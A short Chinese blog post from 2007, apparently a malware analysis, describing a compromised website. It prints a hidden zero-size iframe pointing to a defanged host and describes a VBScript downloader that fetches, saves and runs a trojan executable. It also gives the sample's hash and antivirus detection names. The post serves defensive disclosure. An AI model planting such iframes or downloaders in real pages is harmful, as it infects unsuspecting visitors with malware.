一个下载Dropper.Agent.fwm的网站

来源:互联网 发布:mac迅雷没有速度 编辑:程序博客网 时间:2024/06/10 09:38

endurer 原创

2007-01-23 第1

网站首页包含代码:
/-------
<iframe height="0" width="0" src="hxxp://www.race***s*wd.net.**/1**.htm"></iframe>
-------/


1**.htm 包含VBScript脚本程序,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 1.exe,保存为 %temp%/asde.exe,并利用Shell.Application 对象Q 的 ShellExecute 方法 来运行。


1.exe 采用 WinZip 32-bit SFX 8.x module 制作
/-----
文件说明符 : D:/test/1.exe
获取文件版本信息大小失败!
创建时间 : 2007-1-23 18:51:12
修改时间 : 2007-1-23 18:51:12
访问时间 : 2007-1-23 18:53:13
大小 : 69120 字节 67.512 KB
MD5 : ecfa3e99c7be50ab2480174b8c08d24e
-----/

Kaspersky报为:Trojan-Dropper.Win32.Small.asg,瑞星报为:Dropper.Agent.fwm

原创粉丝点击